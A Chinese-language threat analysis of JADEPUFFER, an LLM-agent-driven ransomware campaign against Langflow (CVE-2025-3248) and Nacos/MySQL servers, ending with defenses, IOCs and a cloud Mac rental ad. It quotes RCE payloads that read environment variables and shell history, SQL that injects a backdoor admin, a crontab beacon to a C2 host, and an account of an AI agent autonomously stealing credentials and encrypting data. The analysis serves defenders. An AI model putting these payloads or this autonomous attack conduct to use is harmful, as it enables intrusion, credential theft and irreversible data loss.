2026 年 7 月 1 日,云安全公司 Sysdig 威胁研究团队(TRT)发布报告,首次披露代号 JADEPUFFER 的攻击事件——这是目前已知第一例端到端、完全由大语言模型驱动的完整勒索操作,从踩点侦察、凭证窃取、横向移动、权限维持到破坏性加密与勒索信投递,全程无人类在关键节点手动操作。攻击经 CVE-2025-3248 拿下公网暴露的 Langflow 实例,再横向攻破运行 MySQL + 阿里巴巴 Nacos 的生产服务器;Sysdig 捕获 600+ 条独立 payload。本文按一手信源完整还原时间线、漏洞机理、双阶段攻击链、四条「自主性」证据、比特币地址悬案、IOC 汇总、官方防御建议与行业反应,并给出六步落地防护。可与 MCP 协议基础设施Claude Code 隐写术事件 交叉阅读。
01

JADEPUFFER 是什么?首例 Agentic Threat Actor 勒索事件概述

一句话结论:Sysdig 将 JADEPUFFER 定义为 Agentic Threat Actor(ATA,智能体威胁行为者)——攻击能力由 AI Agent 交付,而非人工驱动的工具集。这是报告中正式提出的新分类概念。

维度详情
发现方Sysdig TRT,报告作者 Michael Clark(Director of Threat Research)
发布时间2026 年 7 月 1 日(媒体 7 月 2–6 日跟进,公众认知节点多为 7 月 6 日)
攻击者代号JADEPUFFER(Sysdig 官方全大写命名)
入口机公网暴露的 Langflow 实例(CVE-2025-3248 RCE)
真正目标另一台公网暴露、运行 MySQL + Nacos 配置中心的生产服务器
规模600+ 条独立、有明确目的的 payload,压缩时间窗口内执行完毕

时间线:

时间事件
2025 年 4 月Langflow 曝出 CVE-2025-3248(未鉴权代码注入/RCE)
2025 年 5 月 5 日CISA 列入已知被利用漏洞(KEV)目录
2025 年同漏洞被用于投递 Flodrix 僵尸网络(Trend Micro 独立披露,与 JADEPUFFER 无关)
2026 年 6 月JADEPUFFER 对公网 Langflow 发起攻击,攻击链在数周内分多个会话执行
2026 年 7 月 1 日Sysdig 发布完整技术报告
2026 年 7 月 2–6 日Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs 跟进
01

公网暴露 Langflow:AI Agent 编排服务器环境变量常存放大模型 API Key 与云凭证,团队仓促上线、缺乏网络访问控制。

02

高危漏洞长期被扫:CVE-2025-3248 EPSS 被利用概率 91.42%(SentinelOne),公网扫描武器化持续进行。

03

下游基础设施老化:真正目标利用 2021 年 Nacos 鉴权绕过与从未更换的默认 JWT 签名密钥。

04

MySQL root 暴露公网:Agent 用 root 凭证直连暴露端口,凭证来源不明,或为人类预先准备环节。

05

加密密钥不可恢复:uuid4() 随机生成、仅打印 stdout、从未外传——付款也无法解密。

02

CVE-2025-3248 漏洞机理:Langflow 未鉴权 RCE 如何被武器化

项目详情
组件Langflow — 开源可视化 AI Agent 工作流框架,GitHub 星标 7 万+
漏洞类型CWE-94(代码注入)+ CWE-306(关键功能缺失身份验证)
CVSS9.8 Critical,向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影响版本Langflow 1.3.0 之前所有版本
漏洞位置/api/v1/validate/code 接口
修复版本1.3.0(新增身份校验)

成因逐步拆解:该接口本意是校验用户自定义函数节点语法,实现为 ast.parse()compile()exec()完全没有身份认证与沙箱隔离。Python 函数定义时装饰器与参数默认值在定义瞬间立即求值,攻击者把恶意代码写进默认参数,Langflow 做「合法性校验」时代码已在服务器执行——无需登录,一个 HTTP POST 即 RCE

python
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

Trend Micro 在追踪 Flodrix 僵尸网络活动中记录到上述典型 payload(另一波独立利用)。最终下载 700 字节 Bash 脚本拉取 Flodrix ELF 二进制,组建 TCP/UDP 双通道 DDoS 僵尸网络。

维度Flodrix 僵尸网络JADEPUFFER(本事件)
驱动方式传统人工/脚本化投递LLM Agent 端到端自主驱动
入口漏洞CVE-2025-3248CVE-2025-3248
最终目的DDoS 僵尸网络数据库勒索与破坏性加密
关联两起独立活动,共同说明该漏洞长期被公网武器化

补丁分析:Langflow 1.3.0 为 post_validate_code 新增 _current_user: CurrentActiveUser 依赖注入;FastAPI 先校验 JWT Bearer 或 x-api-key,失败直接 401/403,请求不会到达漏洞逻辑。

Langflow 成为「有吸引力入口点」,因为 AI Agent 服务器环境变量里经常存放 OpenAI、Anthropic、DeepSeek、Gemini 及 ALIBABA_/AWS/GCP 等云凭证。

03

完整攻击链还原:Phase 1 Langflow 沦陷与 Phase 2 Nacos 接管

Phase 1 — 拿下 Langflow 主机:全部 payload 以 Base64 编码 Python 经 RCE 端点投递。

侦察与凭证收集(多线程并行):执行 iduname -ahostname,并行扫描 OpenAI/Anthropic/DeepSeek/Gemini API Key、ALIBABA_/ALIYUN_/TENCENT_/HUAWEI_/AWS/GCP/Azure 云凭证、加密货币助记词、数据库配置。

本地数据窃取:导出 Langflow PostgreSQL 后端库中凭证与 API Key,暂存本地审阅后删除痕迹。

MinIO 枚举:探测 minio.internal:9000127.0.0.1:9000,用默认凭证 minioadmin:minioadmin 枚举 Bucket,优先提取 terraform-state 桶与 credentials.json。第一次请求带 ?format=json 收到 XML 后立即改用 XML 解析器重试——典型探测-遇错-自适应闭环。

持久化:安装 crontab 每 30 分钟信标外联 hxxp://45.131.66[.]106:4444/beacon

Phase 2 — 攻破 MySQL + Nacos 生产服务器:Nacos 广泛用于阿里系微服务;鉴权有 CVE-2021-29441 绕过历史,默认 JWT 签名密钥自 2020 年起公开于文档,许多部署未更换。

Nacos 后门管理员注入——31 秒自主修复闭环(UTC 时间戳):

时间(UTC)动作
19:34:24subprocess.run 生成 bcrypt 哈希,插入 xadmin 管理员
19:34:36尝试 xadmin:Xploit@2026# 登录失败
19:34:4812 秒后并行测试 nacos:nacos 默认凭证并重新生成 admin123 哈希
19:35:07放弃 subprocess.run,改用 import bcrypt,删除损坏记录后重建
19:35:18登录成功——总耗时 31 秒
python
cur.execute('DELETE FROM users WHERE username="xadmin"')
hash_val = bcrypt.hashpw(b'admin123', bcrypt.gensalt(rounds=10)).decode()
cur.execute('INSERT INTO users (username, password, enabled) VALUES ("xadmin", "' + hash_val + '", 1)')
cur.execute('INSERT INTO roles (username, role) VALUES ("xadmin", "ROLE_ADMIN")')

容器逃逸探测(约 8 分钟):利用 MySQL INTO OUTFILE / LOAD_FILE 测试写入、读回、/var/run/docker.sock/proc/1/cgroup/etc/hostname,检查 mysql.func UDF 提权可能。进入勒索前主动写「完成标记」_pwn_cleanup.txt——Sysdig 指出这更像结构化 Agent 发信号进入下一阶段,而非固定脚本行为。

破坏性加密:将全部 1,342 条 Nacos 配置项用 AES_ENCRYPT() 加密,删除 config_infohis_config_info,创建勒索表 README_RANSOM。密钥 uuid4() 随机生成、仅打印一次、从未存储——付款也无法恢复。勒索信声称 AES-256,但 MySQL 默认实为 AES-128-ECB。

大规模破坏:按 ROI 优先 DROP DATABASE,代码注释自述「已备份至 64.20.53[.]230」——Sysdig 无独立证据证实数据真被回传。外键约束导致删除失败时,下一条 payload 自动加 SET GLOBAL FOREIGN_KEY_CHECKS=0 修复——需理解失败原因而非无脑重试。

04

JADEPUFFER 事件后如何防护?六步落地操作指南

依据 Sysdig 官方防御建议与事件 IOC,团队可立即执行以下步骤:

01

升级 Langflow:立即升级至修复 CVE-2025-3248 的 1.3.0+不要把代码执行/校验类端点暴露在公网

02

密钥与凭证隔离:勿在 AI 编排服务器环境变量存放大模型 API Key 或云凭证,托管至 KMS 并与公网进程隔离。

03

加固 Nacos:更换默认 token.secret.key,升级强制自定义密钥版本,永不暴露 Nacos 于公网,禁止 root 连接后端库。

04

数据库访问控制:管理员账号不暴露公网,管理端口强唯一凭证 + 来源 IP 限制。

05

出站流量控制:限制被攻陷主机任意信标外联或访问外部暂存服务器(如 45.131.66[.]106、64.20.53[.]230)。

06

运行时检测与 IOC 监控:识别数据库进程恶意行为;监控 crontab 外联、异常 User-Agent。Agent 开发/测试环境隔离详见 帮助中心

检测机会:LLM payload 中充斥自然语言注释解释「为什么」——这种「自我叙事」是防守方此前不曾有过的检测抓手。

05

四条自主性证据、比特币悬案、IOC 与 Sysdig 结论

Sysdig 支撑「LLM 驱动」的四条独立证据线:

1

自我叙事的代码:payload 里大量自然语言注释解释 ROI 排序、哪个数据库最大——LLM 代码生成默认行为,非研究人员事后推断。

2

机器速度故障诊断:Nacos 31 秒修复、MinIO XML/JSON 自适应、JWT 路径遇阻即放弃——做错之后多快、以何方式纠正是最精确证据。

3

自然语言上下文理解:解析目标环境自由文本并采取「只有读懂才会做」的动作,数周不同会话反复出现。

4

比特币地址悬案:勒索地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是 Bitcoin Core 文档标准 P2SH 示例地址,大量存在于 LLM 训练语料;链上 737 笔交易、约 46 BTC 流入后即刻转走。可能是 LLM「幻觉」生成,也可能是攻击者刻意配置——两种可能均无法排除

IOC 类型指标
C2 / 信标45.131.66[.]106,crontab → hxxp://45.131.66[.]106:4444/beacon
数据暂存64.20.53[.]230(InterServer,AS19318)
入口漏洞CVE-2025-3248
勒索比特币3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
联系邮箱e78393397[@]proton[.]me(威胁情报库无先例)
勒索表名README_RANSOM(与 WARNING/RECOVER_YOUR_DATA 等均不匹配)

行业反应:BleepingComputer、Dark Reading 等称「首例完全 AI 驱动勒索」;CSO Online 采访红队专家 Vibhum Dubey:更应担心加密前「安静期」——Agent 摸清身份体系同时规避检测,每次入侵表现形式可能略有不同。多家媒体提及 LLMjacking:若攻击者靠窃取凭证驱动 Agent,多阶段攻击边际成本趋近于零

A

CVSS 9.8 + EPSS 91.42%:CVE-2025-3248 为长期被扫高危入口(NVD / SentinelOne)。

B

600+ payload:压缩窗口内连贯执行,规模与一致性指向自主 Agent 而非固定工具集。

C

1,342 条配置加密 + 密钥不可恢复:即便付款,受害者配置数据已实质性永久丢失。

Sysdig 四点结论:① 勒索门槛降至「运行一个 Agent 的成本」;② 老漏洞被自动化武器化,「把整个历史漏洞库挨个喷一遍」成本近零;③ LLM 自我叙事给防守方可读检测面;④ 「已备份」只是 Agent 代码注释自述,未经核实。

摊开替代方案:在公网裸奔 Langflow/Nacos 做 Agent 原型验证 等于把 API Key 与内网拓扑交给扫描器;本地笔记本 7×24 跑自主 Agent 难以实施出站控制与运行时检测;虚拟机跑 macOS Agent 编排 违反 EULA 且 Metal 性能受限。对需要 iOS CI/CD、完整 Root、隔离测试环境与 7×24 稳定性的 AI Agent 生产与红队仿真KVMNODE 独占 Mac Mini M4 云端租赁通常是更优解:100% 原装物理机、开放 sudo、按天/周/月弹性,Agent 工作流可在与生产网络隔离的环境中审计运行。JADEPUFFER 警示:技能门槛已降到运行 Agent 的成本——防守方应把公网应用服务器、未加固配置中心、公网可达数据库管理员账号当作最先会被盯上的攻击面

参考信源:Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》;BleepingComputer、Dark Reading、CyberScoop、CSO Online、Security Affairs;Trend Micro CVE-2025-3248 / Flodrix 分析;NVD、CISA KEV 目录。